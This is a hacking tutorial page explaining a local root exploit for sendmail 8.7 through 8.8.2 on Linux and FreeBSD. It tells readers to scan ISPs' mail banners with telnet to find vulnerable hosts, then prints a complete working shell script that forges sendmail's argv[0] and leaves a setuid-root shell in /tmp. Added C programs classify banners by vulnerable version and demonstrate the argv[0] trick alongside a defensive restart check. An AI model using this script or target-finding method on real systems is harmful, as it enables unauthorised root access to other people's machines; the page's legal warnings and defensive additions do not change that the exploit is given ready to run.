Shell Programming:
an Exploit Explained, continued...
AN EXPLOIT EXPLAINED
Here's a fun, simple, powerful shell script. This is a goodie that you might be able to use from your shell account to create a root shell for yourself on the computer where you have your shell.
==========================================================
Newbie note: A "root shell" allows you to do anything
you wish to the computer you are on.
==========================================================
==========================================================
You can go to jail warning: In the US and many other countries,
it is illegal even to just get a root shell on someone else's
computer -- unless that person agrees to let you get root.
===========================================================
If you are determined to test this shell script, there are ways to do this legally. Number one, install some form of Unix on your home computer. The easiest to install is Red Hat Linux, available at http://www.redhat.com. The easiest to get exploits to run on is Debian Linux, at http://www.debian.org. For other Linux sources, see the GTMHH "Linux!" at http://www.happyhacker.org.
(Note: this is a local exploit. It only lets someone who already has an ordinary user's shell account on the machine get a root -- superuser -- shell. It does not break in from the outside.)
Make sure your Linux is running an outdated sendmail program, versions 8.7 through 8.8.2.
Next set up user accounts on your home Linux box. The command is "adduser." Then run this exploit from your user account on your home computer. If you have the right version of sendmail, you will be amazed at how easy it is to break in.
The other way to legally run this exploit is to get permission to break into someone else's computer. Soon our Hacker Wargame will offer accounts on a newbie computer that will allow this exploit.
Don't assume you can get away with running this script against a stranger's computer. There is no way to be absolutely certain you won't get caught. Besides, if you have to read this to learn how to break into a computer, you don't know enough to have even a hope of getting away with the crime.
Once you try this exploit you will know how ridiculously easy it is to break into computers. If someone gets busted for breaking into a computer using this shell script, yeah, sure, the media will make out like the person who ran it is a genius. But you are about to learn that a little kid could break into a computer that runs a vulnerable version of sendmail. It's that easy. So anyone who is in the know realizes that it doesn't take brains to break into a computer. They will simply agree with Fatal Error that "To err is human; to get caught is just plain stupid."
Here is how to break into a computer that runs sendmail 8.7 through 8.8.2 on the Linux and FreeBSD operating systems.
1) Look for an Internet service provider running a vulnerable version of sendmail. To do this, get the domain names of some ISPs from http://www.celestin.com/pocia. Another way to get ISP names is from people's email addresses.
Then try telnetting into their smtp (mail server) ports. Use the command:
telnet fubar.com smtp
Trying 208.999.37.180...
Connected to fubar.com (208.999.37.180).
Escape character is '^]'.
220 lobo.net ESMTP
Now there is a smart ISP. They don't tell strangers what mail server program they run: the greeting gives a host name and "ESMTP" and nothing else. But pretty soon you will hit an ISP whose sendmail announces its version right in the greeting banner. You will get a message like this:
telnet foominds.com smtp
Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700
OK, the banner says sendmail 8.7 ("SMI-8.7" is a vendor build of 8.7), which is inside the vulnerable range. But does it also run an operating system this script was written for? You can find that out by telnetting to the login port and reading the banner there:
telnet foominds.com
Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
UNIX(r) System V Release 4.0 (zuni)
login:
We struck out here -- maybe. That login banner says System V Release 4, not Linux or FreeBSD, and this script is only known to work on Linux and FreeBSD running vulnerable versions of sendmail. It may or may not work on this ISP.
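Eyeballing 220 greetings is fine for a couple of hosts, but the version test is worth writing down. Here is an added example written for this page (it is not from the original GTMHH text and not part of sendmail): a small C program that pulls the version number out of a greeting banner, vendor prefixes like "SMI-" included, and says whether it falls in the 8.7 through 8.8.2 range this page is about. The banners in main() are constructed: two are the greetings from the telnet sessions above, the 8.8.2 and 8.8.8 ones are made up. A greeting that doesn't name sendmail or a version gets an "unknown" verdict rather than a guess, which is what the lobo.net banner earns.

```c
/* Added example, not from the Happy Hacker page and not sendmail's code:
 * classify an SMTP greeting against the sendmail version range the page
 * discusses, 8.7 through 8.8.2. All banners in main() are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum banner_verdict {
    BANNER_UNKNOWN = -1,      /* no "Sendmail <version>" in the greeting */
    BANNER_OUT_OF_RANGE = 0,  /* sendmail, but not 8.7 .. 8.8.2 */
    BANNER_VULNERABLE = 1     /* sendmail 8.7.x, 8.8, 8.8.1 or 8.8.2 */
};

/* Pull major.minor[.patch] out of a 220 banner. Vendor builds put text in
 * front of the number (the page's "SMI-8.7/SMI-SVR4"), so skip ahead to the
 * first digit after the word "Sendmail". A missing patch level counts as 0. */
int sendmail_banner_vulnerable(const char *banner)
{
    const char *p = strstr(banner, "Sendmail");
    int major, minor, patch = 0;

    if (p == NULL)
        return BANNER_UNKNOWN;
    p += strlen("Sendmail");
    while (*p != '\0' && !isdigit((unsigned char)*p))
        p++;
    if (sscanf(p, "%d.%d.%d", &major, &minor, &patch) < 2)
        return BANNER_UNKNOWN;         /* "Sendmail" with no parsable version */
    if (major != 8)
        return BANNER_OUT_OF_RANGE;
    if (minor == 7)
        return BANNER_VULNERABLE;      /* every 8.7.x release */
    if (minor == 8 && patch <= 2)
        return BANNER_VULNERABLE;      /* 8.8, 8.8.1, 8.8.2 */
    return BANNER_OUT_OF_RANGE;
}

int main(void)
{
    /* Constructed greetings: the first two are the telnet sessions above,
     * the 8.8.2 and 8.8.8 lines are made up for this example. */
    const char *banners[] = {
        "220 lobo.net ESMTP",
        "220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700",
        "220 mail.example.net ESMTP Sendmail 8.8.2/8.8.2; Sun, 3 May 1998 14:43:07 -0700",
        "220 mail.example.net ESMTP Sendmail 8.8.8/8.8.8; Sun, 3 May 1998 14:43:07 -0700",
    };
    static const char *names[] = { "unknown", "out of range", "VULNERABLE" };
    size_t i;

    for (i = 0; i < sizeof banners / sizeof banners[0]; i++)
        printf("%-12s %s\n",
               names[sendmail_banner_vulnerable(banners[i]) + 1], banners[i]);
    return 0;
}
```

Build it with cc -o banner banner.c and it prints one verdict per greeting. Treat the result as a hint only: an admin can edit the greeting text, so "unknown" or even "out of range" doesn't prove a host is safe, and "VULNERABLE" only means the version matches; this particular script still needs a shell account on the box to do anything with it.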
Let's say you find an ISP where this exploit is certain to work. Since it is a local exploit, your next step is to buy a shell account on this ISP: the script has to run from a shell on the vulnerable machine itself.
===========================================================
You can go to jail warning: The way I am showing you
to break into a computer is GUARANTEED to get you caught.
Don't do this unless you have first gotten permission to try
it out from the owner of your ISP. If you discover your
ISP is vulnerable, your best bet is not to break in. Instead,
politely tell tech support they are vulnerable, and offer to
show them how to break in. They might say "Yes, please
show us how it's done"! Then it will be OK to run
this script.
===========================================================
Now comes the fun part. Give the command "pico s.sh" (or substitute your favorite editor for "pico"). That brings up an editor program. Next, put in the following shell commands:
#!/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
# leshka.c: run the setuid-root sendmail binary, but hand it "/tmp/smtpd"
# as argv[0]. That is all this wrapper does. The list given to execl ends
# with a null pointer, not a bare 0, so it also works on 64-bit systems.
echo '#include <unistd.h> '>>leshka.c
echo 'int main(void) '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",(char *)0); '>>leshka.c
echo ' return 1; '>>leshka.c
echo '} '>>leshka.c
#
#
# smtpd.c: the program a vulnerable sendmail re-executes, still as root,
# when it gets SIGHUP and restarts itself from argv[0]. It leaves a
# setuid-root copy of /bin/sh in /tmp (chmod a=rsx gives mode 6555).
echo '#include <stdlib.h> '>>smtpd.c
echo '#include <unistd.h> '>>smtpd.c
echo 'int main(void) '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo ' return 0; '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
# Start sendmail under the forged name.
./leshka
# The author counts on that sendmail showing up in ps under its forged name
# /tmp/smtpd. Grep for it, drop the grep itself, keep only the first number
# on the line (the PID) and send it SIGHUP. If no such process is listed,
# kill gets no PID at all and fails with a usage error instead.
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
# /tmp/sh only keeps its root effective uid if the shell itself does not
# drop it; bash resets a mismatched effective uid unless started with -p.
echo "Now type: /tmp/sh"
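What the script actually relies on, spelled out as an added example (this C program is not from the original page and is not sendmail's code): leshka.c can pass any string it likes as argv[0] when it execs sendmail, and sendmail 8.7 through 8.8.2 answered a SIGHUP by re-executing whatever argv[0] said, while still root. The program below demonstrates the first half for real: it execs /bin/sh under the forged name /tmp/smtpd and reports what the child saw as $0. The restart_allowed() function is a hypothetical policy for the second half, showing the checks a privileged program should make before re-executing a path it got from argv[0]: refuse a relative path, refuse when a setuid-root binary was started by a non-root real uid (that argv[0] belongs to the caller), and refuse outside daemon mode. Its uid and daemon-mode parameters are assumptions of this illustration, not sendmail's actual fix.

```c
/* Added example, not code from the Happy Hacker page nor from sendmail.
 * Part 1: prove that the program being exec'ed sees whatever argv[0] the
 * caller chose. Part 2: a hypothetical policy a privileged daemon could
 * apply before re-exec'ing itself from that argv[0]. Unix only. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum restart_verdict {
    RESTART_OK = 0,
    REFUSE_RELATIVE_PATH,        /* argv[0] is not an absolute path */
    REFUSE_UNPRIVILEGED_CALLER,  /* setuid root, but started by an ordinary user */
    REFUSE_NOT_DAEMON            /* only the listening daemon may restart itself */
};

/* Hypothetical restart policy. real_uid, eff_uid and daemon_mode stand in
 * for the state a real MTA keeps; the point is that argv[0] of a setuid
 * binary run by an ordinary user is attacker-controlled and must never be
 * exec'ed as root. */
enum restart_verdict restart_allowed(const char *argv0, uid_t real_uid,
                                     uid_t eff_uid, int daemon_mode)
{
    if (argv0 == NULL || argv0[0] != '/')
        return REFUSE_RELATIVE_PATH;
    if (eff_uid == 0 && real_uid != 0)
        return REFUSE_UNPRIVILEGED_CALLER;
    if (!daemon_mode)
        return REFUSE_NOT_DAEMON;
    return RESTART_OK;
}

/* Exec /bin/sh with a forged argv[0], the way leshka.c does with sendmail,
 * and capture what the child reports as $0 (the shell's own argv[0]).
 * Returns the number of bytes captured, or -1 on failure. */
int forged_argv0(const char *fake_name, char *out, size_t outlen)
{
    int fd[2];
    pid_t pid;
    ssize_t n;

    if (pipe(fd) == -1)
        return -1;
    pid = fork();
    if (pid == -1) {
        close(fd[0]);
        close(fd[1]);
        return -1;
    }
    if (pid == 0) {
        /* child: stdout -> pipe, then exec the real /bin/sh under a fake name */
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]);
        close(fd[1]);
        execl("/bin/sh", fake_name, "-c", "printf '%s' \"$0\"", (char *)0);
        _exit(127);
    }
    close(fd[1]);
    n = read(fd[0], out, outlen - 1);
    close(fd[0]);
    waitpid(pid, NULL, 0);
    if (n < 0)
        return -1;
    out[n] = '\0';
    return (int)n;
}

/* Did the exec'ed shell see exactly the name we forged? 1 = yes. */
int forged_argv0_matches(const char *fake_name)
{
    char seen[256];

    if (forged_argv0(fake_name, seen, sizeof seen) < 0)
        return 0;
    return strcmp(seen, fake_name) == 0;
}

int main(void)
{
    char seen[256];

    if (forged_argv0("/tmp/smtpd", seen, sizeof seen) >= 0)
        printf("exec'ed /bin/sh, child saw argv[0] = %s\n", seen);
    /* The situation the script creates: setuid-root sendmail started by
     * uid 1000 with argv[0] = /tmp/smtpd, not running as the daemon. */
    printf("restart_allowed(\"/tmp/smtpd\", 1000, 0, 0) = %d (0 would mean OK)\n",
           restart_allowed("/tmp/smtpd", 1000, 0, 0));
    return 0;
}
```

Build with cc -o argv0 argv0.c; it needs fork(), pipe() and /bin/sh, so it is a Unix-only demonstration. The restart check is the defender's side of the same fact: a setuid program cannot trust argv[0], or anything else the caller hands it, when deciding what to exec as root.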